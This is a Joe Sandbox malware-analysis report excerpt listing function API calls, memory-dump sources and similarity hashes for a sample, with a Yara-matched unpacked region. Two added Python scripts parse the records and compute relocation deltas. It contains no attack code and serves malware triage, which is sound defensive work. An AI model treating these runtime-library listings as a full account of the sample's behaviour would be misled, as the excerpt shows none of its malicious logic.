• Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
• Instruction ID: 53fe295e8d7c1c913dc3419ef71c61c93b0402730f2f3e856031721ee509452d
• Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
• Instruction Fuzzy Hash: 9CC1E270E04389AFDF52DFA9C840BAEBFB1AF89315F04419AE615AB391C7709941CF61

APIs
• _ValidateLocalCookies.LIBCMT ref: 004286FB
• ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
• _ValidateLocalCookies.LIBCMT ref: 00428791
• __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
• _ValidateLocalCookies.LIBCMT ref: 00428811
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: fB$csm
• API String ID: 1170836740-1586063737
• Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
• Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
• Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
• Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

APIs
• FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
• FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
• FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
• PMDtoOffset.LIBCMT ref: 00428D4F
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: FindInstanceTargetType$Offset
• String ID: Bad dynamic_cast!
• API String ID: 1467055271-2956939130
• Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
• Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
• Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
• Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9

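Added example, not part of the Joe Sandbox report or its tooling: a parser for the per-function records listed above (the APIs, Memory Dump Source and Similarity runs) that turns them into structured records and separates the functions lifted from the 024C0000 region (not backed by a PE, carrying Yara matches) from those in the 00400000 image, whose API IDs resolve to CRT internals. The field names and the sample records are copied from the report text above (with the Snapshot File rows and some API rows trimmed); the rule that a record closes at its Instruction Fuzzy Hash line, the handling of a truncated trailing record, and all function and class names are this example's own assumptions.

```python
"""Parse Joe Sandbox per-function similarity records (APIs / Memory Dump Source / Similarity runs)."""
import re
from dataclasses import dataclass, field

API_RE = re.compile(r"^(?:Part of subcall function (?P<parent>[0-9A-F]+): )?(?P<name>\S+?)"
                    r"\.(?P<module>[A-Z0-9]+)(?:\([^)]*\))?,? ref: (?P<ref>[0-9A-F]+)$")
SOURCE_RE = re.compile(r"^Source File: (?P<dump>\S+), Offset: (?P<offset>[0-9A-F]+), "
                       r"based on PE: (?P<pe>true|false)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
ID_FIELDS = {"API ID", "String ID", "API String ID", "Opcode ID", "Instruction ID",
             "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"}

@dataclass
class ApiRef:
    name: str
    module: str
    ref: str
    parent: str = ""  # caller address on "Part of subcall function" rows

@dataclass
class FunctionRecord:
    offset: str = ""
    backed_by_pe: bool = False
    yara_match: bool = False
    apis: list = field(default_factory=list)
    ids: dict = field(default_factory=dict)
    complete: bool = False  # set when the closing field, Instruction Fuzzy Hash, is seen

def parse_records(text: str) -> list:
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()  # the copied page carries hundreds of leading spaces per line
        if line in SECTIONS:
            section = line
        elif line == "Yara matches":
            cur.yara_match = True
        elif line.startswith("• "):
            item = line[2:]
            if section == "APIs":
                if m := API_RE.match(item):
                    cur.apis.append(ApiRef(m["name"], m["module"], m["ref"], m["parent"] or ""))
            elif m := SOURCE_RE.match(item):
                cur.offset, cur.backed_by_pe = m["offset"], m["pe"] == "true"
            else:
                key, _, value = item.partition(":")
                if key in ID_FIELDS:
                    cur.ids[key] = value.strip()
                    if key == "Instruction Fuzzy Hash":
                        cur.complete = True
                        records.append(cur)
                        cur = FunctionRecord()
    if cur.apis or cur.ids or cur.offset:  # trailing record cut off by page truncation
        records.append(cur)
    return records

def unpacked_functions(records):
    """Complete records lifted from memory not backed by a PE on disk and carrying a Yara hit."""
    return [r for r in records if r.complete and not r.backed_by_pe and r.yara_match]

def hash_consistent(r):
    """The report repeats Opcode ID as Opcode Fuzzy Hash; a mismatch means a mangled copy."""
    return "Opcode ID" in r.ids and r.ids["Opcode ID"] == r.ids.get("Opcode Fuzzy Hash")

# Constructed input: three records copied from the report above, with the IDA plugin /
# Snapshot File rows dropped and the third record's API list shortened.
SAMPLE = """\
APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
• Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
• Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
• Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
• Instruction ID: 53fe295e8d7c1c913dc3419ef71c61c93b0402730f2f3e856031721ee509452d
• Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
• Instruction Fuzzy Hash: 9CC1E270E04389AFDF52DFA9C840BAEBFB1AF89315F04419AE615AB391C7709941CF61
APIs
• std::_Cnd_initX.LIBCPMT ref: 024DC71F
  • Part of subcall function 024C1370: __Mtx_unlock.LIBCPMT ref: 024C1377
• Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 024DC73D
Strings
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
"""
```

Feed it the function listing copied as text. The complete records from the 024C0000 dump are the ones worth comparing by Instruction ID or fuzzy hash against other samples; the 00400000 records in this stretch (_free, __cftoe, the DecodePointer routine carrying the acos/asin/exp/log string table, _ValidateLocalCookies, the dynamic_cast helpers) are compiler runtime and can be filtered out before any similarity work. A record that never reaches its Instruction Fuzzy Hash, such as the last one on this page, is kept but flagged incomplete rather than silently merged into its neighbour.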
APIs
• atomic_compare_exchange.LIBCONCRT ref: 024DC6DC
• atomic_compare_exchange.LIBCONCRT ref: 024DC700
• std::_Cnd_initX.LIBCPMT ref: 024DC711
• std::_Cnd_initX.LIBCPMT ref: 024DC71F
  • Part of subcall function 024C1370: __Mtx_unlock.LIBCPMT ref: 024C1377
• std::_Cnd_initX.LIBCPMT ref: 024DC72F
  • Part of subcall function 024DC3EF: __Cnd_broadcast.LIBCPMT ref: 024DC3F6
• Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 024DC73D
Strings
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
• String ID: t#D
• API String ID: 4258476935-1671555958
• Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
• Instruction ID: 3d759f5225e069a456697f62c3be3bbee96de026bff47f4d4e7fd28e880ef105
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8101F775900605A7DB11BB65CDD5B9EB35ABF00314F24011BE81997780DBB8EA15CFD2
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 004321C6
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 004322AB
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 0043231B
                                                                                                                                                                                                                                                                                        • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00432324
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00432349
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3864826663-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                                                                      • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F1444
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F145D
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F148F
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F1498
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F14A4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID: C
                                                                                                                                                                                                                                                                                      • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                                                                                      • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                                                      • Instruction ID: 6a463bac80b8cea68074eaabba28607f2c70697511ba6ab4a69f72bd26ec6326
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29B12775A0121ADBDB64DF18C984BAEB7B5FB88314F1045AEDA0DA7350D770AE90CF40
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                                                      • Instruction ID: b5a4c6b52f6f898d8f653f2790c7ca7625b2d9d3b143d184c2ffadd173a26ac3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A061F271A00215AFDBA0CF69C841B9ABBF5EF84710F2541ABEA58EB341D771A941CB50
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                                                      • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,024EC4A4,E0830C40,?,?,?,?,?,?,024F425F,024CE03C,024EC4A4,?,024EC4A4,024EC4A4,024CE03C), ref: 024F3B2C
                                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 024F3BA7
                                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 024F3BC2
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,024EC4A4,00000001,?,00000005,00000000,00000000), ref: 024F3BE8
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,024F425F,00000000,?,?,?,?,?,?,?,?,?,024F425F,024CE03C), ref: 024F3C07
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,024CE03C,00000001,024F425F,00000000,?,?,?,?,?,?,?,?,?,024F425F,024CE03C), ref: 024F3C40
                                                                                                                                                                                                                                                                                      Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
• Instruction ID: 8770ec38e9b0aeb753cb32315334256fefbe27451603a83cc668d9e1a599ff44
• Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
• Instruction Fuzzy Hash: 6D51C575900289AFDB10CFA8D884AEEBBF4EF49704F14419FE655E7291D7309A81CB64
APIs
• GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
• __fassign.LIBCMT ref: 00433940
• __fassign.LIBCMT ref: 0043395B
• WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
• WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
• WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
• Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
• Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
• Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
APIs
• Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024E4ACD
  • Part of subcall function 024E4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024E4800), ref: 024E4DAC
• Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024E4AE2
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 024E4AF1
• __CxxThrowException@8.LIBVCRUNTIME ref: 024E4AFF
• Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024E4B75
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 024E4BB5
• __CxxThrowException@8.LIBVCRUNTIME ref: 024E4BC3
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
• String ID:
• API String ID: 3151764488-0
• Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
• Instruction ID: 2ea8a0853e9e86f2de4b29290f49ad23bc5bce756762d402b32a1c8f3249b468
• Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
• Instruction Fuzzy Hash: 5C31B639A002149FDF04EF69C881B6E73B6FF44725F20456BD92697351DB70EA05CB94
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
• Instruction ID: e6ab7ff3c47bba42d778d37706de1a90f88c636105697c1691e707d1ea793f03
• Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
• Instruction Fuzzy Hash: 0311B471604165BBEB612F778C48D6B7A9DFFC2B31B12066BFD16D7290DA308845CAB0
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
• Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
• Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
• Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
APIs
  • Part of subcall function 024FA331: _free.LIBCMT ref: 024FA35A
• _free.LIBCMT ref: 024FA638
  • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
  • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
• _free.LIBCMT ref: 024FA643
• _free.LIBCMT ref: 024FA64E
• _free.LIBCMT ref: 024FA6A2
• _free.LIBCMT ref: 024FA6AD
• _free.LIBCMT ref: 024FA6B8
• _free.LIBCMT ref: 024FA6C3
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
• Instruction ID: be180c3adb70505bde73375396f051b30b6fbbecdb948a331ced7e905a8ed422
• Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
• Instruction Fuzzy Hash: 5211F171644B54AAEEB0BBB3CC45FCF7B9EDF84B00F40482EA39DAA150DAA5B5144E50
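The _free record above (dump at Offset 024C0000, based on PE: false, carrying Yara matches) and the _free record that follows it (image at Offset 00400000, based on PE: true) share API String ID 776569668-0 and list the same calls in the same order. Pairing such records and differencing their call-site addresses is one way to check that the Yara-matched region is a relocated copy of code already present in the original image, which is what the report's unpacking signatures claim. The script below is an added example, not Joe Sandbox's own code: it parses the two records (copied from this report as constructed input) and computes the delta. The regexes, the rule of pairing by API String ID and the Record fields are this example's assumptions about the record layout.

```python
"""Pair Joe Sandbox function records from the mapped image (Offset 00400000, based on PE:
true) with those from the unpacked region (Offset 024C0000, based on PE: false, where the
Yara matches are) and check whether aligned call sites differ by one constant delta.
Added example, not Joe Sandbox code; RECORDS is copied from this report's two _free records."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample input: the report's two _free records, trimmed to the lines this
# script reads (hash, snapshot-file and Similarity header lines left out).
RECORDS = """\
APIs
  • Part of subcall function 024FA331: _free.LIBCMT ref: 024FA35A
• _free.LIBCMT ref: 024FA638
  • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
  • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
• _free.LIBCMT ref: 024FA643
• _free.LIBCMT ref: 024FA64E
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
• API String ID: 776569668-0
APIs
  • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
• _free.LIBCMT ref: 0043A3D1
  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
• _free.LIBCMT ref: 0043A3DC
• _free.LIBCMT ref: 0043A3E7
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API String ID: 776569668-0
"""

CALL_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
                     r"(?P<name>[A-Za-z_][\w:@]*)\.[A-Z0-9]+(?:\(.*\),)?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
SRC_RE = re.compile(r"Offset:\s*([0-9A-F]{8}),\s*based on PE:\s*(true|false)")
SID_RE = re.compile(r"^•\s*API String ID:\s*(\S+)$")

@dataclass
class Record:
    calls: list = field(default_factory=list)  # (name, call-site addr, enclosing subcall addr or None)
    offset: int = 0                            # base of the dump this function lives in
    based_on_pe: bool = False                  # True for the mapped image, False for a raw region
    api_string_id: str = ""                    # Joe Sandbox's hash of the API set the function uses
    yara: bool = False                         # record carried a "Yara matches" section

def parse_records(text):
    """Split report text into records; each 'APIs' header opens a new one."""
    records, cur = [], None
    for line in (ln.strip() for ln in text.splitlines() if ln.strip()):
        if line == "APIs" or cur is None:      # a record tail without APIs still gets its own entry
            cur = Record()
            records.append(cur)
            if line == "APIs":
                continue
        if line == "Yara matches":
            cur.yara = True
        elif m := CALL_RE.match(line):
            cur.calls.append((m["name"], int(m["ref"], 16), int(m["caller"], 16) if m["caller"] else None))
        elif m := SRC_RE.search(line):
            cur.offset, cur.based_on_pe = int(m.group(1), 16), m.group(2) == "true"
        elif m := SID_RE.match(line):
            cur.api_string_id = m.group(1)
    return records

def pair_records(records):
    """Match image records (based on PE: true) with dump records (false) sharing an API String ID."""
    by_id = defaultdict(list)
    for r in records:
        if r.api_string_id:                    # call-less records have no ID and cannot be paired
            by_id[r.api_string_id].append(r)
    return [(sid, img, dmp) for sid, grp in by_id.items()
            for img in grp if img.based_on_pe for dmp in grp if not dmp.based_on_pe]

def call_deltas(img, dmp):
    """Align call sites in report order and return (name, image addr, dump addr, delta).
    Stops at the first name mismatch so unrelated calls are never paired; zip() stops at
    the shorter record, so a truncated record still aligns as far as it goes."""
    out = []
    for (na, ra, ca), (nb, rb, cb) in zip(img.calls, dmp.calls):
        if na != nb:
            break
        out.append((na, ra, rb, rb - ra))
        if ca is not None and cb is not None:  # the enclosing subcall function moved as well
            out.append((na + " caller", ca, cb, cb - ca))
    return out

def relocation_delta(img, dmp):
    """The one constant delta if every aligned site agrees, else None."""
    deltas = {d for _, _, _, d in call_deltas(img, dmp)}
    return deltas.pop() if len(deltas) == 1 else None

if __name__ == "__main__":
    for sid, img, dmp in pair_records(parse_records(RECORDS)):
        print(f"API String ID {sid}: image {img.offset:08X} vs dump {dmp.offset:08X}, Yara in dump: {dmp.yara}")
        for name, a, b, d in call_deltas(img, dmp):
            print(f"  {name:<22}{a:08X} -> {b:08X}  delta {d:08X}")
        delta, base = relocation_delta(img, dmp), dmp.offset - img.offset
        print("  no single delta: not a straight relocated copy" if delta is None
              else f"  constant delta {delta:08X} = base delta {base:08X} + {delta - base:X}")
```

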